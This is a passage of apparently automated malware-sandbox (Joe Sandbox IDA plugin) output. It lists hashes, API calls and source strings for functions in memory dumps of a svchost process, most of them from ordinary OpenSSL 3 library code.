                                                                                              • Opcode ID: 06c8006b2e40a1b02f2937bba9d3daa3392596c9965291c53121d202f0f451b8
                                                                                              • Instruction ID: a6c690fc7c4ad125f6452d29da4510a78f9609d2262ab1e3dfa78bf125776778
                                                                                              • Opcode Fuzzy Hash: 06c8006b2e40a1b02f2937bba9d3daa3392596c9965291c53121d202f0f451b8
                                                                                              • Instruction Fuzzy Hash: FD41D13339160586EB20DB36E91436E6765E792BECF884121DE1E47764DF38C892C700
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47CB02,?,00007FFBAB4350C9), ref: 00007FFBAB482551
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47CB02,?,00007FFBAB4350C9), ref: 00007FFBAB482569
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47CB02,?,00007FFBAB4350C9), ref: 00007FFBAB4825EE
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47CB02,?,00007FFBAB4350C9), ref: 00007FFBAB482606
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: custom_ext_parse$ssl\statem\extensions_cust.c
                                                                                              • API String ID: 193678381-3931677214
                                                                                              • Opcode ID: 594981efdf0b0bc1dd16da0d9763bae2fcac2d566868208271724ffb70fb5ae8
                                                                                              • Instruction ID: ff6226efcd7288f0ceefbbb4d94d6d500799e98e1ff2165a90e4b1c10cf9ed1e
                                                                                              • Opcode Fuzzy Hash: 594981efdf0b0bc1dd16da0d9763bae2fcac2d566868208271724ffb70fb5ae8
                                                                                              • Instruction Fuzzy Hash: 6041A3B2A0E68282E7629B75E5507BE6390FB94B84F54C031EE5D83BB5DE3CD845CB00
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: ssl\statem\extensions_srvr.c$tls_construct_stoc_status_request
                                                                                              • API String ID: 193678381-1174127863
                                                                                              • Opcode ID: 69967520ab07d786b5007b022920560fe12736c1b069c0e31d578238edd2043d
                                                                                              • Instruction ID: 3e6bc3f9503f9dcda9149e09f30947a445ea6e2b641e9f60b8c7e5c4e484389e
                                                                                              • Opcode Fuzzy Hash: 69967520ab07d786b5007b022920560fe12736c1b069c0e31d578238edd2043d
                                                                                              • Instruction Fuzzy Hash: E33172A1F1A55242FBA29776E5957BD2350AB44BC4F548032EF2C87AF6DF2CE8858700
                                                                                              APIs
                                                                                                • Part of subcall function 00007FFBAB411740: CRYPTO_zalloc.LIBCRYPTO-3-X64 ref: 00007FFBAB4120F6
                                                                                                • Part of subcall function 00007FFBAB411740: CRYPTO_free.LIBCRYPTO-3-X64 ref: 00007FFBAB412138
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,00000000,00007FFBAB4756B4), ref: 00007FFBAB478B14
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,00000000,00007FFBAB4756B4), ref: 00007FFBAB478B2C
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,00000000,00007FFBAB4756B4), ref: 00007FFBAB478B4A
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,00000000,00007FFBAB4756B4), ref: 00007FFBAB478B62
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_freeO_zalloc
                                                                                              • String ID: ssl\record\methods\tls_common.c$tls_initialise_write_packets_default
                                                                                              • API String ID: 2822291608-433091719
                                                                                              • Opcode ID: c208c9c7c89a00b8ead086420fa9b379340a8a7e8dee45128d96744d93d39b55
                                                                                              • Instruction ID: 410063d27f4d858c406a6a6651b45ec64f129feb5b361b582bbb4b67e5d43708
                                                                                              • Opcode Fuzzy Hash: c208c9c7c89a00b8ead086420fa9b379340a8a7e8dee45128d96744d93d39b55
                                                                                              • Instruction Fuzzy Hash: 5131C1B2B0968286E752DB36E8417BA6751FF447C4F448032EE6D43BA6EE3CE195C740
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_clear_flagsO_set_flags
                                                                                              • String ID: ossl_statem_server_read_transition$ssl\statem\statem_srvr.c
                                                                                              • API String ID: 3946675294-702932334
                                                                                              • Opcode ID: 382df98638a1e4465aad15199b773374ec11609d9035a1cbd4d713e8dba48c40
                                                                                              • Instruction ID: 1a025a81d40cc7b5e8961095b57fb147b8c77a2cfcd4dfd099c45f298b68a17f
                                                                                              • Opcode Fuzzy Hash: 382df98638a1e4465aad15199b773374ec11609d9035a1cbd4d713e8dba48c40
                                                                                              • Instruction Fuzzy Hash: 9221B2A1A0A28242FB96DB75D8D53FC2B90EB44788F48C436DE5D87BE2CE7DD4858301
                                                                                              APIs
                                                                                              • CreateSemaphoreA.KERNEL32 ref: 64941B20
                                                                                              • CreateSemaphoreA.KERNEL32 ref: 64941B36
                                                                                              • InitializeCriticalSection.KERNEL32 ref: 64941B5B
                                                                                              • InitializeCriticalSection.KERNEL32 ref: 64941B61
                                                                                              • InitializeCriticalSection.KERNEL32 ref: 64941B67
                                                                                              • CloseHandle.KERNEL32 ref: 64941B90
                                                                                              • CloseHandle.KERNEL32 ref: 64941BA5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalInitializeSection$CloseCreateHandleSemaphore
                                                                                              • String ID:
                                                                                              • API String ID: 3487344249-0
                                                                                              • Opcode ID: eb7254ae0b87aaabb354fe5c7cf01b8aa784702653ead7a0c4080870feffabbc
                                                                                              • Instruction ID: 31c3c2f24a53828e468885d33ffcfcee3f6f88692367c2784a926345d8c92843
                                                                                              • Opcode Fuzzy Hash: eb7254ae0b87aaabb354fe5c7cf01b8aa784702653ead7a0c4080870feffabbc
                                                                                              • Instruction Fuzzy Hash: 40219D327016418AFB099F32F9503AA37E5EB45B98F088139CE2D4B398EF38C495C750
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_vset_errorX_freeY_free
                                                                                              • String ID: ssl\s3_lib.c$ssl_generate_param_group
                                                                                              • API String ID: 576972184-387558606
                                                                                              • Opcode ID: 6c832336910e37df2c60674589dbba50d4f605e1a216c7111e2cf0958ac00a81
                                                                                              • Instruction ID: 25b81b905e168040deea149fb3f84b4eb99c232a76c9ef0cedb83d09927575ff
                                                                                              • Opcode Fuzzy Hash: 6c832336910e37df2c60674589dbba50d4f605e1a216c7111e2cf0958ac00a81
                                                                                              • Instruction Fuzzy Hash: 152158A1A5FB8241E661DB76F54116E6350FF84BC0F089435EE6D477AADF3CE4448701
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_vset_error
                                                                                              • String ID: ssl\statem\statem_srvr.c$tls_process_end_of_early_data
                                                                                              • API String ID: 4275876640-1059509600
                                                                                              • Opcode ID: 4485de0aa40c5a7896a7b2ff5e6624c0cb4c7c79709b11956f7b9e4c8be99114
                                                                                              • Instruction ID: 348b769402de6db91a07440c2a594e192e50a93784f04e9190a137bcace21436
                                                                                              • Opcode Fuzzy Hash: 4485de0aa40c5a7896a7b2ff5e6624c0cb4c7c79709b11956f7b9e4c8be99114
                                                                                              • Instruction Fuzzy Hash: 1A1163B2B0D14182E7529B7AE8926FD6351EF80784F488432DF2D876B6DEADD4848315
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_vset_error
                                                                                              • String ID: final_renegotiate$ssl\statem\extensions.c
                                                                                              • API String ID: 4275876640-1968291038
                                                                                              • Opcode ID: ec150c88d15395adc615c92e4221016b800d5573465288725ea1e7b60c0f820d
                                                                                              • Instruction ID: 4ba58d7c75a528cce73fd706d3a8ec1a4143cb60cbc5022eadc9ed1c72b3c9f6
                                                                                              • Opcode Fuzzy Hash: ec150c88d15395adc615c92e4221016b800d5573465288725ea1e7b60c0f820d
                                                                                              • Instruction Fuzzy Hash: 9D118CF2B1B38282FB6397B5D892BF822509F40711F848431DE3D466F2DE2CA9D68640
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseCurrentHandleOpen_errno
                                                                                              • String ID:
                                                                                              • API String ID: 2250453136-0
                                                                                              • Opcode ID: 647cea97fea39e1f8afd9dff8aee47f7913a4ca09984285e2b8a4a307c22f2b2
                                                                                              • Instruction ID: c4dd9a8f5984872ef2400fb7ba57e55cf54f323c349d37ceb4cc8f7486eb7d88
                                                                                              • Opcode Fuzzy Hash: 647cea97fea39e1f8afd9dff8aee47f7913a4ca09984285e2b8a4a307c22f2b2
                                                                                              • Instruction Fuzzy Hash: ED01B57538570183EB1D5F65D84831E26E79F4BB69F144228DE29423E1EF3EC968C620
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_errorY_free
                                                                                              • String ID: SSL_CTX_use_PrivateKey_ASN1$ssl\ssl_rsa.c
                                                                                              • API String ID: 3531505993-1862755855
                                                                                              • Opcode ID: ed0d18ab2099c77e0a78522ff7d3284bc7cf175882dee49ffdb4f9cbf1770d66
                                                                                              • Instruction ID: 0ae813e58ce3029b2b363d013ac6a9ea10dd8304ab5d824698077d800232f3ac
                                                                                              • Opcode Fuzzy Hash: ed0d18ab2099c77e0a78522ff7d3284bc7cf175882dee49ffdb4f9cbf1770d66
                                                                                              • Instruction Fuzzy Hash: 9801D6A2B0AB4181E651EB36F5812FDA361EF88BC0F548035EF6C43BB6DE3CD5548600
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$Leave$Enter$CurrentReleaseSemaphoreThread
                                                                                              • String ID:
                                                                                              • API String ID: 4252005047-0
                                                                                              • Opcode ID: c46529817478278fc2bd1f70c2c3e8cb07736d1c93b2ed49c2fcda5e9561b559
                                                                                              • Instruction ID: b6325f3caa9928e10f5b89cb859c4ab8aee5b010b18750466830bc485dbec623
                                                                                              • Opcode Fuzzy Hash: c46529817478278fc2bd1f70c2c3e8cb07736d1c93b2ed49c2fcda5e9561b559
                                                                                              • Instruction Fuzzy Hash: ED11F7B6A1AB02D7DB559F72E59512937B0FB48B84F048435CE1E93724DF38E4A88740
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: A_freeR_newR_set_debugR_set_error
                                                                                              • String ID: SSL_CTX_use_RSAPrivateKey_ASN1$ssl\ssl_rsa_legacy.c
                                                                                              • API String ID: 4284916926-3527806555
                                                                                              • Opcode ID: 8ba72beae7d7639a58e8190c9d48f9912f529a2c437f245ef5816c94eae23363
                                                                                              • Instruction ID: 3d1646128d74b7bb71598fee8bbd5b060ece8fcc3756baa90239dc99dda51fb7
                                                                                              • Opcode Fuzzy Hash: 8ba72beae7d7639a58e8190c9d48f9912f529a2c437f245ef5816c94eae23363
                                                                                              • Instruction Fuzzy Hash: AA01D6A1B5964241EA52E776E5822BD6290EF487C0F488436FD7E47BABDD2CD4498600
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Max Stream Data: %llu$Max stream data
                                                                                              • API String ID: 4098839300-2997325953
                                                                                              • Opcode ID: 891ab0ae919b933d83dc4a02e257d866c9f1b0ab6a12a6ec1125c9ed7e5be16b
                                                                                              • Instruction ID: df2184f1a98eccc7f7d2d3cf45dbbb06a8ca03c3aa6d682d36f52cf8951da621
                                                                                              • Opcode Fuzzy Hash: 891ab0ae919b933d83dc4a02e257d866c9f1b0ab6a12a6ec1125c9ed7e5be16b
                                                                                              • Instruction Fuzzy Hash: A9012CE2E0965384FB26DBB5E8513FD23A1AF44794F409036DE2D4B6A5DE7CE0868301
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: expect_quic$ossl_quic_reset$ssl\quic\quic_impl.c
                                                                                              • API String ID: 1552677711-1634402930
                                                                                              • Opcode ID: 9600cdcd5425ecf6749ce272cfe2b585568329d36cf7f1c0e9f756ac37b25d4b
                                                                                              • Instruction ID: 6c659ad0c77f03ff121407d0851a54ab53a3834d0ad3dbfd3760aad6c51bf9af
                                                                                              • Opcode Fuzzy Hash: 9600cdcd5425ecf6749ce272cfe2b585568329d36cf7f1c0e9f756ac37b25d4b
                                                                                              • Instruction Fuzzy Hash: 9701A2B1A0B54292FB67A778D452ABD6661EF00340F40C53AED6D426F1DE3DE988C700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Max Data: %llu$Max data
                                                                                              • API String ID: 4098839300-1929194112
                                                                                              • Opcode ID: 4dbca8024f379955c1d958b78c7429e55b08b5d694a725fdce9a9183ff5156f9
                                                                                              • Instruction ID: ee978d55f53fdd6e6f1b7213c20400a5f1e86c14157019ddae4f853794ac49a8
                                                                                              • Opcode Fuzzy Hash: 4dbca8024f379955c1d958b78c7429e55b08b5d694a725fdce9a9183ff5156f9
                                                                                              • Instruction Fuzzy Hash: 550181E1F0965384FE2ADB75E8513FD1391AF45794F409036DE2D4B6A5DE7CE0868300
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Max Data: %llu$Data blocked
                                                                                              • API String ID: 4098839300-2931694649
                                                                                              • Opcode ID: cc19025d04c9d1e5c4184106632c55020d344e396dd73dae189ccf0bcab6ce50
                                                                                              • Instruction ID: 29a468480df08e662389808b2f65b6999a48d7bd253dcf53dec5dd7f7a173df5
                                                                                              • Opcode Fuzzy Hash: cc19025d04c9d1e5c4184106632c55020d344e396dd73dae189ccf0bcab6ce50
                                                                                              • Instruction Fuzzy Hash: 670162E1E0965380FA26DBB5E8613FD1351AF40794F409036DE3D0B5E5DE7CE0868201
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Data: %016llx$Path response
                                                                                              • API String ID: 4098839300-2557722110
                                                                                              • Opcode ID: 2cd10418bdca348c1bddf889d55552fcf8b130cd6c50977f5115fb6d9bc5a203
                                                                                              • Instruction ID: eb4a5ef8d290974ee8ac19aa39029607f40559db1e9eba989da4c2e767c377bc
                                                                                              • Opcode Fuzzy Hash: 2cd10418bdca348c1bddf889d55552fcf8b130cd6c50977f5115fb6d9bc5a203
                                                                                              • Instruction Fuzzy Hash: 9E016DE2E0A64290FE26EB75E8A13FD1350AF40794F50903ADE2E066E5DE3CE4868201
                                                                                              APIs
                                                                                              • RAND_bytes_ex.LIBCRYPTO-3-X64(00000001,00007FFBAB45A52B,?,?,?,?,?,00007FFBAB45A862,00007FFBAB44C589), ref: 00007FFBAB46AC4A
                                                                                              • ERR_new.LIBCRYPTO-3-X64(00000001,00007FFBAB45A52B,?,?,?,?,?,00007FFBAB45A862,00007FFBAB44C589), ref: 00007FFBAB46AC54
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(00000001,00007FFBAB45A52B,?,?,?,?,?,00007FFBAB45A862,00007FFBAB44C589), ref: 00007FFBAB46AC6C
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(00000001,00007FFBAB45A52B,?,?,?,?,?,00007FFBAB45A862,00007FFBAB44C589), ref: 00007FFBAB46AC7D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
